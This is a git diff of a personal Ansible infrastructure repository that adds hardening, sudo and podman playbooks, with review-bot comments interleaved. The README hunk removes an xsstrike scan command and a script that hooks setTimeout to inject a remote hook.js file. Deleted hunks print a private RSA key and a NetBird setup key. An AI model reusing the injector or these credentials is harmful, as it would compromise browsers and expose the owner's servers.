diff --git a/README.md b/README.md index 19c2558..df57862 100644 --- a/README.md +++ b/README.md @@ -1,25 +1,21 @@ # semaphore ``` - python3 xsstrike.py -u https://147.135.51.88/login -(function() { - const originalSetTimeout = window.setTimeout; - window.setTimeout = function(fn, delay) { - if (delay > 0) { - const wrapped = function() { - if (!window.xetLoaded) { - var s = document.createElement('script'); - s.src = 'https://xet.jingoh.fr/hook.js'; - document.head.appendChild(s); - window.xetLoaded = true; - } - return fn.apply(this, arguments); - }; - return originalSetTimeout(wrapped, delay); - } - return originalSetTimeout(fn, delay); - }; -})(); + +# hardening + +https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo +singleplatform-eng.users +dev-sec.os_hardening : +dev-sec.ssh_hardening : +geerlingguy.firewall : +jnv.unattended-upgrades + + +# apps stacks + +https://github.com/alvistack/ansible-role-podman => installation podman +https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services ``` 
@@ -40,83 +36,3 @@ Add - package - firewall - - -flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true - -GITEA_TOKEN=fdsfsd - -==> delete secret in flux-system - -┌─[stephane@staff] - [~] - [2024-08-28 01:05:37] -└─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: 
unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded - - - - - -┌─[stephane@staff] - [~] - [2024-08-28 01:13:04] -└─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 
'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded'] - - - - -# docker run -d -p 127.0.0.1:8000:8080 -e DATA_ROOT=/DATA -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock --name casaos casaos \ No newline at end of file diff --git a/Vagrantfile b/Vagrantfile index e6df6ff..b773b59 100644 --- a/Vagrantfile +++ b/Vagrantfile 
@@ -1,29 +1,16 @@ -# -*- mode: ruby -*- -# vi: set ft=ruby : - -NNODES=2 - -$script = <<-SCRIPT -echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE=" >> /home/vagrant/.ssh/authorized_keys -SCRIPT - -# All Vagrant configuration is done below. The "2" in Vagrant.configure -# configures the configuration version (we support older styles for -# backwards compatibility). Please don't change it unless you know what -# you're doing. Vagrant.configure("2") do |config| - (0..NNODES - 1).each do |i| - config.vm.define "k8s-ubuntu-#{i}" do |node| - #node.vm.box = "ubuntu/focal64" - node.vm.box = "ubuntu/jammy64" - node.vm.hostname = "k8s-ubuntu-#{i}" - config.vm.provider "virtualbox" do |v| - v.memory = 2048 - v.cpus = 2 - end - node.vm.network "private_network", ip: "192.168.25.11#{i}" - node.vm.provision "shell", inline: $script - node.vm.provision "shell", inline: "echo hello from node #{i}" - end + config.vm.box = "generic/ubuntu2204" + config.vm.network "private_network", type: "dhcp" + # config.vm.network :hostonly, "192.168.1.21" + config.vm.synced_folder ".", "/vagrant", disabled: true + config.vm.provider "qemu" do |qe| + qe.qemu_dir = "/usr/bin/" + qe.arch="x86_64" + qe.memory = "2048" + qe.smp = "4" + qe.machine = "q35" + qe.cpu = "max" + qe.net_device = "virtio-net-pci" end -end \ No newline at end of file +end + diff --git a/collections/requirements.yml b/collections/requirements.yml index adadbd9..3c2cab1 100644 --- a/collections/requirements.yml 
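Review bot: `qe.arch="x86_64"` is the only assignment in the new provider block written without spaces around `=`; `qe.arch = "x86_64"` matches the sibling `qe.memory = "2048"` style lines. `config.vm.box = "generic/ubuntu2204"` is not pinned, so each `vagrant up` on a fresh host pulls whatever version the box catalog currently serves; adding `config.vm.box_version` next to it makes the test VM image reproducible. The `# -*- mode: ruby -*-` and `# vi: set ft=ruby :` modelines are dropped together with the old header comment although the file still has no extension, so editors that relied on them to detect the file type lose that hint; keeping those two comment lines costs nothing.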
+++ b/collections/requirements.yml
@@ -5,8 +5,9 @@ collections:
 # - name: ansible.utils
 # # - name: community.grafana
 - name: community.docker
- #! bitwarden
 - name: bitwarden.secrets
+ - name: devsec.hardening
+ - name: fedora.linux_system_roles
 # - name: community.general
 # # - name: geerlingguy.redis
 # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git
diff --git a/files/swarm/config/traefik-dynamic-configuration.yml b/files/swarm/config/traefik-dynamic-configuration.yml
deleted file mode 100644
index 610cba6..0000000
--- a/files/swarm/config/traefik-dynamic-configuration.yml
+++ /dev/null
@@ -1,4 +0,0 @@
-tls:
- certificates:
- - certFile: /run/secrets/wildcard-jingoh-private.crt
- keyFile: /run/secrets/wildcard-jingoh-private.key
\ No newline at end of file
diff --git a/files/swarm/tls/jingoh.private.crt b/files/swarm/tls/jingoh.private.crt
deleted file mode 100644
index a46aab1..0000000
--- a/files/swarm/tls/jingoh.private.crt
+++ /dev/null
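Review bot: The two added collections `devsec.hardening` and `fedora.linux_system_roles` carry no `version:`, so every `ansible-galaxy collection install -r collections/requirements.yml` resolves to whatever Galaxy serves at that moment, and a hardening run can change behaviour between two hosts set up days apart; pinning each entry, e.g. `- name: devsec.hardening` followed by `  version: "<pinned version>"`, keeps the security roles reproducible. The same applies to the roles this commit adds in `roles/requirements.yml` (`singleplatform-eng.users`, `linux-system-roles.sudo`, `geerlingguy.firewall`, `linux-system-roles.selinux`, `alvistack.podman`, `linux-system-roles.podman`), which accept a `version:` key as well.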
@@ -1,22 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL -BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD -VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV -BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5 -MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w -DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx -FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A -MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm -Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ -f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X -SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e -nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy -B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG -A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw -DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw -fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt -v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe -SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh -Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD -8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0= ------END CERTIFICATE----- \ No newline at end of file diff --git a/files/swarm/tls/jingoh.private.key b/files/swarm/tls/jingoh.private.key deleted file mode 100644 index bc9b8cd..0000000 --- a/files/swarm/tls/jingoh.private.key +++ /dev/null 
@@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8 -iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L -pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx -IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122 -5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj -b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD -TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy -Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN -n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW -J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH -3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6 -tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm -K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR -faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI -HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd -O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih -SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0 -WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki -0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH -cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj -Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx -UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw -PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3 -B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI -tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H ------END RSA PRIVATE KEY----- \ No newline at end of file diff --git a/group_vars/all.yml b/group_vars/all.yml index a23c8d2..c040cff 100644 --- a/group_vars/all.yml +++ b/group_vars/all.yml 
@@ -1,38 +1,54 @@ #* USERS +users: + - username: bot + name: bot user + # groups: ['wheel','systemd-journal'] + # uid: 1000 + home: /home/bot + # profile: | + # alias ll='ls -lah' + ssh_key: + - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW" + - username: dbtest + name: dbtest user + # groups: ['wheel','systemd-journal'] + # uid: 1000 -management_user_list: - - name: stephane - shell: '/bin/bash' - authorized_keys: - - key: "ssh-rsa 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 stephane" - exclusive: yes - sudo: - hosts: ALL - as: ALL - commands: ALL - nopasswd: ALL - - -#* GO - -golang_gopath: /usr/local/go -# golang_download_dir: /home/stephane/.ansible/tmp/downloads +sudo_sudoers_files: + - path: /etc/sudoers.d/bot + user_specifications: + - users: + - bot + hosts: + - ALL + operators: + - ALL + commands: + - "NOPASSWD: ALL" #* PACKAGES package_repo: - python3-pip - #! argocd control plane - - sshpass + - podman + - lsof +# - libsemanage + +# package_pip: +# - python3-libsemanage + #* FIREWALL firewall_allowed_tcp_ports: - "22" + - "2222" - "80" + - "8080" - "443" - "9100" + - "32222" # #! Kubernetes control plane ports # - "6443" # - "2379" @@ -43,23 +59,4 @@ firewall_allowed_tcp_ports: # - "9090" # - "3000" # - "9323" -#! Kubernetes Worker ports - - - -#* NETBIRD - -netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD -netbird_register: true - -#* TLS - -node_exporter_tls_server_config: - cert_file: /etc/node_exporter/tls.cert - key_file: /etc/node_exporter/tls.key - -#* NODE_EXPORTER - -# node_exporter_basic_auth_users: -# randomuser: examplepassword -node_exporter_web_listen_address: "{{ host_private_address }}:9100" +#! Kubernetes Worker ports \ No newline at end of file diff --git a/hardening-linux.yml b/hardening-linux.yml index d155ad4..9aa43bf 100644 --- a/hardening-linux.yml +++ b/hardening-linux.yml 
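Review bot: The three ports added to `firewall_allowed_tcp_ports` (`"2222"`, `"8080"`, `"32222"`) have no comment saying which service they belong to, while the neighbouring entries are annotated in the `# #! Kubernetes control plane ports` style; a short `# 2222: <service>` style comment per new port keeps the exposed surface reviewable. `sudo_sudoers_files` grants `bot` `ALL` hosts, `ALL` operators and `"NOPASSWD: ALL"` in `/etc/sudoers.d/bot`; if `bot` is the account used with `become: true` in the new plays this is what an unattended Ansible run needs, but a comment stating that purpose would keep the grant from being copied to other users later. The `dbtest` user is declared with no `ssh_key` and no other visible credential, so how that account is meant to log in is unclear from this file; an explicit key or a comment would help.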
@@ -1,11 +1,34 @@ -- hosts: all +- hosts: localtest + #! Need first setup with root access user become: true - roles: - # #! need change for iphone ssh access - # - name: devsec.hardening.ssh_hardening - # #! be carefull - # - name: devsec.hardening.os_hardening + pre_tasks: + - ansible.builtin.apt: + update_cache: yes -# - community.general.ufw: -# state: enabled -# policy: allow \ No newline at end of file + - ansible.builtin.apt: + name: "*" + state: latest + + - ansible.builtin.apt: + upgrade: safe + + - ansible.builtin.apt: + clean: yes + + - ansible.builtin.apt: + name: "{{ item }}" + state: latest + loop: "{{ package_repo }}" + when: package_repo is defined + + - ansible.builtin.pip: + name: "{{ item }}" + loop: "{{ package_pip }}" + when: package_pip is defined + + roles: + - name: singleplatform-eng.users + - name: linux-system-roles.sudo + - name: devsec.hardening.ssh_hardening + - name: devsec.hardening.os_hardening + - name: geerlingguy.firewall \ No newline at end of file diff --git a/hosts b/hosts index 2ab34f7..da6c469 100644 --- a/hosts +++ b/hosts @@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane [tower] scaleway ansible_host=163.172.84.28 ansible_user=stephane +; [localtest] +; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup +; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 ; [local] ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias ; [cluster] diff --git a/podman.yml b/podman.yml new file mode 100644 index 0000000..5b6b393 --- /dev/null +++ b/podman.yml 
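Review bot: `hosts: localtest` targets a group that this same commit adds to the `hosts` inventory only as `;`-commented lines (`; [localtest]`, `; test ansible_host=...`), so as committed this play and `podman.yml` match no hosts unless the group is defined in an inventory not shown here; either uncomment the group or point the plays at an existing one. The first two `ansible.builtin.apt` tasks overlap: `name: "*"` with `state: latest` already upgrades every installed package, so the following `upgrade: safe` task repeats that work. The `package_repo` install loops `apt` once per package; `name: "{{ package_repo }}"` with `state: latest` installs the whole list in one transaction and keeps the `when: package_repo is defined` guard. None of the six `pre_tasks` carries a `name:`, unlike the named tasks in `podman.yml`, which makes the play output hard to follow; a label such as `name: Refresh apt cache` on each helps.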
@@ -0,0 +1,138 @@ +- hosts: localtest + become: true + vars: + #! SECRETS + # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}" + # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}" + # bw_client_password: "{{ lookup('env', 'bw_client_password') }}" + # bw_client_id: "{{ lookup('env', 'bw_client_id') }}" + # user_mail: "{{ lookup('env', 'mail') }}" + # user: "{{ lookup('env', 'username') }}" + # # Token full access gitea + # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}" + #! PODS + # podman_registries_conf: + # aliases: + # myregistry: quay.io + # podman_registry_username: test + # podman_registry_password: test + podman_create_host_directories: true + # podman_firewall: + # - port: 8080-8081/tcp + # state: enabled + # - port: 12340/tcp + # state: enabled + # podman_selinux_ports: + # - ports: 8080-8081 + # setype: http_port_t + podman_kube_specs: + - state: started + run_as_user: bot + run_as_group: bot + kube_file_content: + apiVersion: v1 + kind: Pod + metadata: + name: db + spec: + containers: + - name: db + image: docker.io/mysql:9 + ports: + - containerPort: 1234 + hostPort: 12340 + volumeMounts: + - mountPath: /var/lib/db:Z + name: db + volumes: + - name: db + hostPath: + path: /var/lib/db + # podman_secrets: + # - name: mysql-root-password-container + # state: present + # skip_existing: true + # data: "{{ root_password_from_vault }}" + # - name: mysql-root-password-kube + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # password: "{{ root_password_from_vault | b64encode }}" + # kind: Secret + # metadata: + # name: mysql-root-password-kube + # - name: envoy-certificates + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # certificate.key: {{ key_from_vault | b64encode }} + # certificate.pem: {{ cert_from_vault | b64encode }} + # kind: Secret + # metadata: + # name: envoy-certificates + # - state: started + # run_as_user: webapp + # 
run_as_group: webapp + # kube_file_src: /path/to/webapp.yml + +#! SECRETS + pre_tasks: + - name: Install Bitwarden CLI + ansible.builtin.command: + cmd: "{{ item }}" + delegate_to: localhost + loop: + - apk add --no-cache nodejs npm + - npm install -g @bitwarden/cli + + - ansible.builtin.command: + cmd: bw logout + delegate_to: localhost + ignore_errors: true + + - name: bitwarden token session + ansible.builtin.shell: "{{ item }}" + environment: + BW_CLIENTID: "{{ bw_client_id }}" + BW_CLIENTSECRET: "{{ bw_client_secret }}" + BW_PASSWORD: "{{ bw_client_password }}" + loop: + - bw config server {{ vaultwarden_url }} + - bw login --apikey + - bw unlock --passwordenv BW_PASSWORD --raw + delegate_to: localhost + register: bw_session_result + + - name: Get secret from Bitwarden + command: + argv: + - bw + - get + - password + - "{{ bw_requested_password_id }}" + - --session + - "{{ bw_session_result.results[-1].stdout | trim }}" + delegate_to: localhost + register: gitea_token_result + no_log: true + changed_when: false + + # - name: Return all secrets from a path + # ansible.builtin.debug: + # msg: "{{ gitea_token_result.stdout }}" + # delegate_to: localhost + + - ansible.builtin.set_fact: + gitea_token : "{{ gitea_token_result.stdout | trim }}" + no_log: true + delegate_to: localhost + +#! ROLES + roles: + #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers + #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. + - name: linux-system-roles.podman \ No newline at end of file diff --git a/roles/.gitignore b/roles/.gitignore index 2b44480..8bec64d 100644 --- a/roles/.gitignore +++ b/roles/.gitignore 
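Review bot: The `bitwarden token session` task registers the output of `bw unlock --passwordenv BW_PASSWORD --raw` in `bw_session_result` without `no_log: true`, so the raw session key is printed in the play output and any configured callback or log, while only the later `Get secret from Bitwarden` task is protected; add `no_log: true` to that task as well. The variables it consumes (`bw_client_id`, `bw_client_secret`, `bw_client_password`, `vaultwarden_url`, `bw_requested_password_id`) are all commented out under `vars:` and are not defined in `group_vars/all.yml` as shown in this commit, so the pre_tasks will fail on undefined variables unless they are supplied elsewhere. `bw config server {{ vaultwarden_url }}` is interpolated into `ansible.builtin.shell` unquoted; `bw config server {{ vaultwarden_url | quote }}` keeps a value containing shell metacharacters from being split. The `Get secret from Bitwarden` task uses the short module name `command` while every other task uses `ansible.builtin.command` or `ansible.builtin.shell`. The `gitea_token` fact is set but not consumed anywhere in this playbook as shown.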
@@ -47,4 +47,12 @@ cloudalchemy.grafana
 CTL-Fed-Security.ansible-grafana
 thomasjpfan.docker-swarm
 asg1612.dockerswarm
-gantsign.golang
\ No newline at end of file
+gantsign.golang
+singleplatform-eng.users
+linux-system-roles.sudo
+devsec.hardening.os_hardening
+devsec.hardening.ssh_hardening
+geerlingguy.firewall
+alvistack.podman
+linux-system-roles.podman
+linux-system-roles.selinux
\ No newline at end of file
diff --git a/roles/requirements.yml b/roles/requirements.yml
index b62fd7f..aba7997 100644
--- a/roles/requirements.yml
+++ b/roles/requirements.yml
@@ -13,6 +13,19 @@
 # - src: geerlingguy.kubernetes
 # PIP
 - src: geerlingguy.pip
+#! USER
+- src: singleplatform-eng.users
+- src: linux-system-roles.sudo
+#! HARDENING => collection
+# - src: devsec.hardening.os_hardening
+# - src: devsec.hardening.ssh_hardening
+- src: geerlingguy.firewall
+- src: linux-system-roles.selinux
+#! PODS
+- src: alvistack.podman
+- src: linux-system-roles.podman
+# - src: fedora.linux_system_roles.firewall
+# jnv.unattended-upgrades
 # - src: asg1612.dockerswarm
 # SYSTEM
 # - src: tumf.systemd-service
diff --git a/screenshots/http---23.134.94.44-32132.jpeg b/screenshots/http---23.134.94.44-32132.jpeg
deleted file mode 100644
index 97b9a60..0000000
Binary files a/screenshots/http---23.134.94.44-32132.jpeg and /dev/null differ
diff --git a/templates/alerts.sh.j2 b/templates/alerts.sh.j2
deleted file mode 100644
index 838f95d..0000000
--- a/templates/alerts.sh.j2
+++ /dev/null
@@ -1,63 +0,0 @@ -#!/bin/bash - -# Monitoring script - -# Secrets -username="{{ alert_username }}" -password="{{ alert_password }}" -VAULT="{{ alert_vault }}" - -# Servers -servers=({{ alert_list_server | join (' ') }}) -local_ip=$(hostname -I | awk '{print $1}') - -# SSL -site="{{ alert_server_ssl }}" - -# Vérifier s'il y a un paramètre -if [ $# -ne 1 ]; then - echo "Usage : $0 [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]" - exit 1 -fi - -# Récupérer le paramètre -parametre="$1" - -# Vérifier la valeur du paramètre et afficher le résultat correspondant -if [ "$parametre" = "storage" ]; then - [ $(df -h / | awk 'NR==2 {sub(/%/, "", $(NF-1)); print $(NF-1)}') -gt 80 ] && curl -u "$username:$password" -H "Title: Full Storage" -H "ta:card_index_dividers" -d "90% used on `hostname`" https://alert.jingoh.fr/{{ alerts_storage }} -elif [ "$parametre" = "load" ]; then - [ $(uptime | awk -F'load average: ' '{print $2}' | awk '{print $1}' | cut -d , -f1) '>' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery" -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }} -elif [ "$parametre" = "ping" ]; then - for ip in "${servers[@]}" - do - if [ "$ip" != "$local_ip" ]; then - ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos" -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }} - fi - done -elif [ "$parametre" = "health" ]; then - [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang" -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang" -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" 
https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang" -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} -elif [ "$parametre" = "ssl" ]; then - expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s) - current_timestamp=$(date +%s) - difference=$((expiration_timestamp - current_timestamp)) - threshold=$((20 * 24 * 3600)) # 20 jours en secondes - if [ $difference -lt $threshold ]; then - curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key" -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }} - fi -elif [ "$parametre" = "backup_git" ]; then - docker exec -u git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini - mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/ - docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql - mv ./gitea-db-pg.sql /opt/dockerapps/backup/ - curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray" -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }} -elif [ "$parametre" = "backup_vault" ]; then - docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual - curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray" -d "Local Backup vault done !" 
